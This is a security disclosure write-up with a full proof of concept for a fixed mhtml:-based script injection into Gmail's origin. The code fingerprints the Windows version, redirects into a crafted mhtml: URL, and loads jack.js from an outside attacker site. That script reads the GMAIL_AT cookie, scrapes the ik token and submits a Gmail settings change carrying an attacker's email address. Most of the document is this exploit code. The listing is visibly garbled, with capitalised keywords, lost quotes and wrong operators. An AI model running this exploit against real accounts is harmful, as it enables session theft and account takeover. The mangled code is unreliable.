Brief description:
See the detailed description and proof of concept below: an mhtml:-based script injection into the mail.google.com origin that reads the victim's GMAIL_AT cookie and submits a Gmail settings change on their behalf.
Detailed description:
This issue has already been reported and fixed (see the Solution section); the complete proof of concept follows.
Proof of vulnerability:
<Script language = "javascript">
// Stage 1 (landing page): fingerprint the Windows version from the user agent and
// redirect the browser into an mhtml: URL that targets a Gmail support page.
//
// NOTE(review): this listing is extraction-damaged throughout — JavaScript keywords
// are capitalised (Function/Var/If/Return), spaces are inserted around dots,
// parentheses and URL punctuation, and `==` / `||` appear as `=` / `|`. Read it as
// the intended JavaScript; as printed it does not parse.
//
// Returns the string "other " in every case; the caller ignores the value.
Function detectOS (){
// The NT version string in the user agent is what selects the payload variant.
Var sUserAgent = navigator. userAgent;
// NOTE(review): as printed `=` assigns to navigator.platform instead of comparing;
// presumably `==` and `||` originally, otherwise isWin evaluates to
// ("Win32" | "Windows ") == 0 and nothing below ever runs.
Var isWin = (navigator. platform = "Win32") | (navigator. platform = "Windows ");
If (isWin ){
// Windows 2000 / XP / Server 2003 (NT 5.x).
Var isWin2K = sUserAgent. indexOf ("Windows NT 5.0")>-1 | sUserAgent. indexOf ("Windows 2000")>-1;
Var isWinXP = sUserAgent. indexOf ("Windows NT 5.1")>-1 | sUserAgent. indexOf ("Windows XP")>-1;
Var isWin2003 = sUserAgent. indexOf ("Windows NT 5.2")>-1 | sUserAgent. indexOf ("Windows 2003")>-1;
// The reflected `answer` query parameter carries injected line breaks followed by
// `Content-Location:` and `Content-Transfer-Encoding: base64` headers, so the
// mhtml: handler parses the reflected text as a MIME part of the response and the
// part body (the script tag shown further down) runs in the mail.google.com origin.
// On NT 5.x the line breaks are double-encoded (%250A -> %0A after one decode);
// which decoding stage that is meant to survive is not shown here — TODO confirm.
If (isWin2K | isWinXP | isWin2003) document. location = "mhtml: https://mail.google.com/support/bin/answer.py? Answer = 6576 & cbid =-1vw2scem46j8f & src = cb & lev= index & answer = % 250AContent-Location: viki % 250aContent-Transfer-Encoding: base64 % Signature =! Viki ";
// Windows Vista / 7 (NT 6.x).
Var isWinVista = sUserAgent. indexOf ("Windows NT 6.0")>-1 | sUserAgent. indexOf ("Windows Vista")>-1;
Var isWin7 = sUserAgent. indexOf ("Windows NT 6.1")>-1 | sUserAgent. indexOf ("Windows 7")>-1;
// Same injection for NT 6.x, but single-encoded (%0A) and with an empty
// Content-Transfer-Encoding value, i.e. the part body is not base64 here.
If (isWin7 | isWinVista) document. location = "mhtml: https://mail.google.com/support/bin/answer.py? Answer = 6576 & cbid =-1vw2scem46j8f & src = cb & lev= index & answer = % 0AContent-Location: viki % 0aContent-Transfer-Encoding: Signature =! Viki ";
}
// Falls through to here whether or not a redirect was assigned; nothing reads this.
Return "other ";
}
// Run the fingerprint/redirect as soon as the landing page's script is parsed.
// NOTE(review): JavaScript identifiers are case-sensitive, so `DetectOS` would not
// resolve to `detectOS` as printed — another capitalisation artifact of the listing.
DetectOS ();
</Script>
The body of the injected MIME part (declared `Content-Transfer-Encoding: base64` in the NT 5.x variant above) is a `<script>` tag that loads an external JavaScript file from the attacker's site:
<Script src = http://www.bkjia.com/jack.js> </script>
The contents of jack.js are as follows:
// Stage 2 (jack.js): presumably executing in the mail.google.com origin, since the
// mhtml: URL points there and the same-origin iframe/cookie access below requires it.
// Writes a zero-sized iframe pointing at a Gmail page (mail/x/) and hooks its onload
// to crosscookie(). `& gt;` is an extraction-mangled `>`.
Document. write (<iframe id = ifr width = 0 height = 0 onload = "crosscookie ()" src ="Http://mail.google.com/mail/x/ & gt; </iframe & gt;
// Stage 3: with a same-origin Gmail iframe loaded, (1) read the GMAIL_AT cookie —
// the value Gmail also expects as the `at` CSRF token — out of the iframe's document,
// (2) fetch the inbox HTML and scrape the `ik` value from its inline GLOBALS array,
// (3) POST a settings change (view=mdlg) with both tokens, then navigate away.
//
// NOTE(review): besides the capitalisation/spacing damage, string literals in this
// listing have lost their quotes (`GMAIL_AT`, `jacks@gmail.com`, `GET`, `POST`,
// `Microsoft.XMLHttp`, the URL fragments, `[` / `]`), regex backslashes are gone,
// and `reg.exec` / `ifr.document` were split at what looked like file extensions.
// Read it as the intended JavaScript; as printed it does not parse.
Function crosscookie (){
// Cookie name to look for. As printed this reads the hoisted-but-undefined
// variable declared below, so the loop would never match — presumably "GMAIL_AT".
Var KEY = GMAIL_AT;
// Attacker-controlled address submitted in the final POST; presumably a string literal.
Var MAIL = jacks@gmail.com
// Resolve the iframe element (id `ifr`) to its window so its document, cookies and
// ActiveXObject can be used from here; only works because both frames share an origin.
Ifr = ifr. contentWindow? Ifr. contentWindow: ifr. contentDocument;
// Split the iframe document's cookie string on `;` (intended regex: /\s*;\s*/).
Var cookies = ifr.doc ument. cookie. split (/s *; s */);
// The cookie value (reused as the `at` token) and the `ik` value scraped from the page.
Var GMAIL_AT;
Var IK;
// Linear scan for the KEY cookie; `=` on the comparison is presumably `==`.
For (var I = 0, len = cookies. length; I <len; I ++ ){
Var arr = cookies [I]. split (/s * = s */);
If (arr [0] = KEY ){
GMAIL_AT = arr [1];
}
}
// IE-only XMLHTTP object created in the iframe's window — consistent with the
// mhtml: delivery vector, which is an Internet Explorer feature.
Var xhr = new ifr. ActiveXObject (Microsoft. XMLHttp );
// Synchronous GET of the Gmail inbox, carrying the victim's session cookies.
Xhr. open (GET, https://mail.google.com/mail/, false );
Xhr. send ();
Var source = xhr. responseText;
// Locate the inline `GLOBALS=[` array in the page source (intended: /GLOBALS=\[/;
// as printed the unescaped `[` opens a character class).
Var reg =/GLOBALS = [/;
Var result = reg.exe c (source );
// pos = index just past the opening `[`; `(result +)` is presumably `(result + "")`,
// the matched text.
Var pos = result. index + (result +). length;
Var len = source. length;
Var l = 1;
Var start = pos;
// Walk forward counting nested `[` / `]` until the bracket that closes GLOBALS.
// NOTE(review): `c = [`, `c = ]` and `l = 0` are presumably `==` comparisons
// against quoted literals; as printed the depth never changes and the loop
// runs to the end of the source.
While (pos <len ){
Var c = source. charAt (pos );
If (c = [){
L ++;
} Else if (c =]) {
L --;
}
If (l = 0) break;
Pos ++;
}
// eval the array text ("[" + ... + "]") and take element 9, which is used as `ik`
// below. eval on fetched page content is why this scrape is brittle.
IK = eval ([+ source. substring (start, pos) +]) [9];
// Synchronous POST to the Gmail settings endpoint (view=mdlg) with the scraped ik
// and the cookie value as the `at` CSRF token; body is "mdrp=1&mda=" + MAIL.
// What mdlg / mdrp / mda control is not shown here — presumably a delivery or
// delegation setting pointing at MAIL; confirm against the original advisory.
Xhr. open (POST, https://mail.google.com/mail? Ui = 2 & ik = + IK + & view = mdlg & at = + GMAIL_AT, false );
Xhr. setRequestHeader ("Content-Type", "application/x-www-form-urlencoded ")
Xhr. send (mdrp = 1 & mda = + MAIL );
// Finally navigate the top document to a static image on the attacker's site,
// presumably so the victim does not see the exploit page.
Document. location = "http://www.bkjia.com/images/scan.jpg ";
// Window. close ();
}
The impact needs little explanation: the script runs with the victim's Gmail session, reads the GMAIL_AT cookie that doubles as the CSRF token, scrapes the account's ik value, and submits a settings change on the victim's behalf.
Solution:
Google has already fixed this on the live site, so the POC is being released. Webmail XSS is still worth studying — some teams remain very fond of this kind of issue — and so are mhtml: problems: the server-side fix removes the reflected parameter, but the root cause on the client is that Internet Explorer's mhtml: protocol handler parses injected `Content-Location:` / `Content-Transfer-Encoding:` headers in a response as a MIME part and executes it in the response's origin.